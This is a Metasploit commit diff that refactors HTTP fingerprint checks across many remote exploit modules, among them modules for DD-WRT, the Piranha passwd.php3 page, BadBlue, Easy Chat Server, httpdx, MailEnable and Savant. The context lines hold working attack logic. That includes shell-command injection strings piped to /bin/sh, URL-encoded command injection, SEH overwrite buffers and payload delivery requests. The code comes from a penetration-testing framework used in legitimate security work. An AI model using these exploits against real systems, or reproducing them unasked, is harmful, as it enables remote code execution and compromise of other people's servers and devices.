http fingerprint checking update
git-svn-id: file:///home/svn/framework3/trunk@9719 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ba76698b5a
commit
663b863b6d
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /DD-WRT/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -33,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'CVE', '2009-2765' ],
|
[ 'CVE', '2009-2765' ],
|
||||||
[ 'OSVDB', '55990' ],
|
[ 'OSVDB', '55990' ],
|
||||||
[ 'BID', '35742' ],
|
[ 'BID', '35742' ],
|
||||||
[ 'URL', 'http://www.milw0rm.com/exploits/9209'],
|
[ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
|
||||||
|
|
||||||
],
|
],
|
||||||
'Platform' => ['unix'],
|
'Platform' => ['unix'],
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
|
@ -59,10 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
if not (http_fingerprint =~ /DD-WRT/)
|
|
||||||
raise RuntimeError, "The target server doesn\'t seem to be running DD-WRT."
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||||
# TODO: force use of echo-ne CMD encoder
|
# TODO: force use of echo-ne CMD encoder
|
||||||
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
||||||
|
|
|
@ -16,6 +16,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /Apache/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -81,11 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
info = http_fingerprint
|
|
||||||
if not (info =~ /Apache/)
|
|
||||||
raise RuntimeError, 'The target server is not running Apache.'
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
|
cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
|
||||||
str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
|
str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
|
||||||
print_status("Sending GET request with encoded command line...")
|
print_status("Sending GET request with encoded command line...")
|
||||||
|
@ -103,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
||||||
print_status("Command successfully executed (according to the server).")
|
print_status("Command successfully executed (according to the server).")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => datastore['PATH']
|
'uri' => datastore['PATH']
|
||||||
}, 5)
|
}, 5)
|
||||||
|
|
||||||
info = http_fingerprint({ :response => res })
|
info = http_fingerprint({ :response => res }) # check method
|
||||||
if (info =~ /Sun/)
|
if (info =~ /Sun/)
|
||||||
print_status("Found server: #{info}")
|
print_status("Found server: #{info}")
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
|
|
|
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
http_fingerprint({ :response => res })
|
http_fingerprint({ :response => res }) # check method
|
||||||
|
|
||||||
if (res.code != 200)
|
if (res.code != 200)
|
||||||
print_status("The server returned #{res.code} #{res.message}")
|
print_status("The server returned #{res.code} #{res.message}")
|
||||||
|
|
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => '/'
|
'uri' => '/'
|
||||||
}, 5)
|
}, 5)
|
||||||
|
|
||||||
info = http_fingerprint({ :response => res })
|
info = http_fingerprint({ :response => res }) # check method / Custom server check
|
||||||
if res and res['Server']
|
if res and res['Server']
|
||||||
print_status("Found RTSP: #{res['Server']}")
|
print_status("Found RTSP: #{res['Server']}")
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
|
|
|
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
}, 5)
|
}, 5)
|
||||||
|
|
||||||
http_fingerprint({ :response => res })
|
http_fingerprint({ :response => res }) # check method
|
||||||
|
|
||||||
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
||||||
ver = $1
|
ver = $1
|
||||||
|
|
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
}, 25)
|
}, 25)
|
||||||
|
|
||||||
http_fingerprint({ :response => res })
|
http_fingerprint({ :response => res }) # check method
|
||||||
|
|
||||||
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
|
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
|
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = AverageRanking
|
Rank = AverageRanking
|
||||||
|
|
||||||
|
# XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Seh
|
include Msf::Exploit::Seh
|
||||||
|
|
||||||
|
@ -75,31 +77,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Identify the target based on the SecurityGateway version number
|
# Identify the target based on the SecurityGateway version number
|
||||||
def auto_target
|
def auto_target
|
||||||
print_status("Attempting to automatically select a target...")
|
info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting
|
||||||
res = send_request_raw(
|
if (info =~ /SecurityGateway (1\..*)$/)
|
||||||
{
|
|
||||||
'uri' => '/SecurityGateway.dll'
|
|
||||||
}, 10)
|
|
||||||
|
|
||||||
http_fingerprint({ :response => res })
|
|
||||||
|
|
||||||
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
|
|
||||||
case $1
|
case $1
|
||||||
when /1\.0\.1/
|
when /1\.0\.1/
|
||||||
return self.targets[1]
|
return self.targets[1]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# Not vulnerable
|
# Not vulnerable
|
||||||
return nil
|
nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
if auto_target
|
||||||
|
Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
# handle auto-targeting
|
# handle auto-targeting
|
||||||
mytarget = target
|
mytarget = target
|
||||||
if target.name =~ /Automatic/
|
if target.name =~ /Automatic/
|
||||||
|
print_status("Attempting to automatically select a target...")
|
||||||
mytarget = auto_target
|
mytarget = auto_target
|
||||||
if mytarget.nil?
|
if mytarget.nil?
|
||||||
raise RuntimeError, "Unable to automatically select a target"
|
raise RuntimeError, "Unable to automatically select a target"
|
||||||
|
|
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /Apache/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -160,14 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def check
|
def check
|
||||||
response = send_request_raw({'uri' => '/'}, 5)
|
response = send_request_raw({'uri' => '/'}, 5)
|
||||||
|
|
||||||
http_fingerprint({ :response => response })
|
|
||||||
|
|
||||||
if response.nil?
|
if response.nil?
|
||||||
print_status("No response to request")
|
print_status("No response to request")
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
|
http_fingerprint({ :response => response }) # Custom Server header matching
|
||||||
|
|
||||||
code = Exploit::CheckCode::Appears
|
code = Exploit::CheckCode::Appears
|
||||||
|
|
||||||
case response['Server']
|
case response['Server']
|
||||||
|
@ -196,16 +197,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def auto_target
|
def auto_target
|
||||||
response = send_request_raw({'uri' => '/'}, 5)
|
response = send_request_raw({'uri' => '/'}, 5)
|
||||||
|
|
||||||
http_fingerprint({ :response => response })
|
|
||||||
|
|
||||||
targets_to_try = []
|
|
||||||
|
|
||||||
if response.nil?
|
if response.nil?
|
||||||
print_error("No response to request")
|
print_error("No response to request")
|
||||||
return targets_to_try
|
return targets_to_try
|
||||||
end
|
end
|
||||||
|
|
||||||
|
http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection
|
||||||
|
|
||||||
|
targets_to_try = []
|
||||||
server_hdr = response['Server']
|
server_hdr = response['Server']
|
||||||
print_status("Server: #{server_hdr}")
|
print_status("Server: #{server_hdr}")
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,11 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
|
||||||
|
# However, a proper Server header is returned when requesting /index.html or using HEAD.
|
||||||
|
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::Seh
|
include Msf::Exploit::Remote::Seh
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -50,40 +54,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Apr 20 2003',
|
'DisclosureDate' => 'Apr 20 2003',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
Opt::RPORT(80)
|
|
||||||
], self.class )
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
connect
|
info = http_fingerprint # check method
|
||||||
|
if (info =~ /BadBlue\/2\.5/)
|
||||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
|
||||||
resp = sock.get_once
|
|
||||||
disconnect
|
|
||||||
|
|
||||||
if (resp =~ /BadBlue\/2.5/)
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
return Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
|
||||||
|
|
||||||
uri = "GET /ext.dll?mfcisapicommand="
|
uri = "GET /ext.dll?mfcisapicommand="
|
||||||
sploit = rand_text_alphanumeric(500)
|
sploit = rand_text_alphanumeric(500)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[492, seh.length] = seh
|
sploit[492, seh.length] = seh
|
||||||
|
uri << sploit
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
send_request_raw({ 'uri' => uri })
|
||||||
sock.put(uri + sploit + "\r\n\r\n")
|
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -14,6 +14,10 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
|
||||||
|
# However, a proper Server header is returned when requesting /index.html or using HEAD.
|
||||||
|
HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Seh
|
include Msf::Exploit::Seh
|
||||||
|
|
||||||
|
@ -58,11 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
# NOTE: BadBlue doesn't give any HTTP headers when requesting '/', but it will if requesting /index.html
|
|
||||||
if not (http_fingerprint =~ /BadBlue\//)
|
|
||||||
raise RuntimeError, "The target server doesn't appear to be running BadBlue."
|
|
||||||
end
|
|
||||||
|
|
||||||
seh_offset = 4116
|
seh_offset = 4116
|
||||||
sploit = Rex::Text.pattern_create(seh_offset)
|
sploit = Rex::Text.pattern_create(seh_offset)
|
||||||
# Need to jump over the nul byte
|
# Need to jump over the nul byte
|
||||||
|
|
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /Apache/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::Seh
|
include Msf::Exploit::Remote::Seh
|
||||||
|
|
||||||
|
@ -60,10 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
if not (http_fingerprint =~ /Apache/)
|
|
||||||
raise RuntimeError, "The target server doesn't appear to be running Apache."
|
|
||||||
end
|
|
||||||
|
|
||||||
sploit = rand_text_alphanumeric(5800)
|
sploit = rand_text_alphanumeric(5800)
|
||||||
sploit[5781, 8] = generate_seh_record(target.ret)
|
sploit[5781, 8] = generate_seh_record(target.ret)
|
||||||
# Jump backward to the payload
|
# Jump backward to the payload
|
||||||
|
|
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::Seh
|
include Msf::Exploit::Remote::Seh
|
||||||
|
|
||||||
|
@ -64,27 +66,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class )
|
], self.class )
|
||||||
end
|
end
|
||||||
|
|
||||||
def auto_target
|
def check
|
||||||
info = http_fingerprint
|
info = http_fingerprint # check method
|
||||||
# NOTE: Version 2.2 still reports "1.0" in the "Server" header
|
# NOTE: Version 2.2 still reports "1.0" in the "Server" header
|
||||||
if (info =~ /Easy Chat Server\/1\.0/)
|
if (info =~ /Easy Chat Server\/1\.0/)
|
||||||
return targets[0]
|
|
||||||
end
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
if auto_target
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
end
|
end
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
if not auto_target
|
|
||||||
raise RuntimeError, "The server doesn't appear to be running a vulnerable EasyChatServer"
|
|
||||||
end
|
|
||||||
|
|
||||||
# randomize some values.
|
# randomize some values.
|
||||||
val = rand_text_alpha(rand(10) + 1)
|
val = rand_text_alpha(rand(10) + 1)
|
||||||
num = rand_text_numeric(1)
|
num = rand_text_numeric(1)
|
||||||
|
|
|
@ -28,6 +28,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::Seh
|
include Msf::Exploit::Remote::Seh
|
||||||
|
|
||||||
|
@ -89,23 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
def auto_target
|
|
||||||
info = http_fingerprint
|
|
||||||
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
|
|
||||||
ver = $1
|
|
||||||
#print_status("HTTPDX version detected : #{ver}")
|
|
||||||
|
|
||||||
# this will need to be updated if httpdx is ever fixed :)
|
|
||||||
case ver
|
|
||||||
when "1.4"
|
|
||||||
return targets[0]
|
|
||||||
end
|
|
||||||
end
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
if (auto_target)
|
info = http_fingerprint # check method
|
||||||
|
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
|
@ -113,10 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
if not auto_target
|
|
||||||
raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
|
|
||||||
end
|
|
||||||
|
|
||||||
uri = payload.encoded
|
uri = payload.encoded
|
||||||
if target['Offset'] > payload_space
|
if target['Offset'] > payload_space
|
||||||
pad = target['Offset'] - payload_space
|
pad = target['Offset'] - payload_space
|
||||||
|
|
|
@ -226,7 +226,7 @@ For now, that will have to be done manually.
|
||||||
|
|
||||||
|
|
||||||
def get_version
|
def get_version
|
||||||
info = http_fingerprint
|
info = http_fingerprint # Custom version extraction / automatic target
|
||||||
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
|
if info and (info =~ /httpdx\/(.*) \(Win32\)/)
|
||||||
return $1
|
return $1
|
||||||
end
|
end
|
||||||
|
|
|
@ -14,6 +14,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => [ /MailEnable/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -51,9 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
info = http_fingerprint
|
info = http_fingerprint # check method
|
||||||
|
if (info =~ /MailEnable/)
|
||||||
if (info =~ /.*MailEnable/)
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
end
|
end
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
|
@ -62,7 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')
|
buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')
|
||||||
|
|
||||||
send_request_raw({
|
send_request_raw(
|
||||||
|
{
|
||||||
'headers' => { 'Authorization' => buffer }
|
'headers' => { 'Authorization' => buffer }
|
||||||
}, 2)
|
}, 2)
|
||||||
|
|
||||||
|
|
|
@ -15,6 +15,8 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
HttpFingerprint = { :pattern => /Savant\/3\.1/ }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -69,16 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def auto_target
|
|
||||||
info = http_fingerprint
|
|
||||||
if info and (info =~ /Savant\/3\.1/)
|
|
||||||
return targets[0]
|
|
||||||
end
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
if (auto_target)
|
info = http_fingerprint # check method
|
||||||
|
if info and (info =~ /Savant\/3\.1/)
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
|
@ -112,11 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
mytarget = auto_target
|
|
||||||
if not mytarget
|
|
||||||
raise RuntimeError, 'The target web server is not Savant 3.1'
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Searching for a suitable nopsled...")
|
print_status("Searching for a suitable nopsled...")
|
||||||
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
|
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
|
||||||
until findnop
|
until findnop
|
||||||
|
@ -124,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Found one! Sending exploit.")
|
print_status("Found one! Sending exploit.")
|
||||||
sploit = findnop + " /" + payload.encoded + [mytarget['Ret']].pack('V')
|
sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
|
||||||
res = send_request_raw(
|
res = send_request_raw(
|
||||||
{
|
{
|
||||||
'method' => sploit,
|
'method' => sploit,
|
||||||
|
|
|
@ -14,6 +14,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
|
# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -68,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def auto_target
|
def auto_target
|
||||||
|
|
||||||
res = send_request_raw(
|
res = send_request_raw(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URL']
|
'uri' => datastore['URL']
|
||||||
}, -1)
|
}, -1)
|
||||||
|
http_fingerprint({ :response => res }) # XXX: Needs custom body match
|
||||||
http_fingerprint({ :response => res })
|
|
||||||
|
|
||||||
# Was a vulnerable system detected?
|
# Was a vulnerable system detected?
|
||||||
t = nil
|
t = nil
|
||||||
|
|
Loading…
Reference in New Issue